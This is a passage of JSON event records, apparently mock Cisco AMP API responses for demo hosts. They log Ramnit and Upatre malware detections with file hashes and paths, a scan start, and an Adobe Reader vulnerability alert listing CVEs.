Data\\iwkikcbw\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":345000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Start Menu\\Programs\\Startup\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758215","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":189000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758213","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":17000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758212","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":970000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":939000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892411109048000,"timestamp":1610704826,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361000000300,"timestamp":1610704823,"timestamp_nanoseconds":0,"date":"2021-01-15T10:00:23+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704823,"start_date":"2021-01-15T10:00:23+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263623","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263622","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263621","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":673000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263620","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263619","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":627000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767f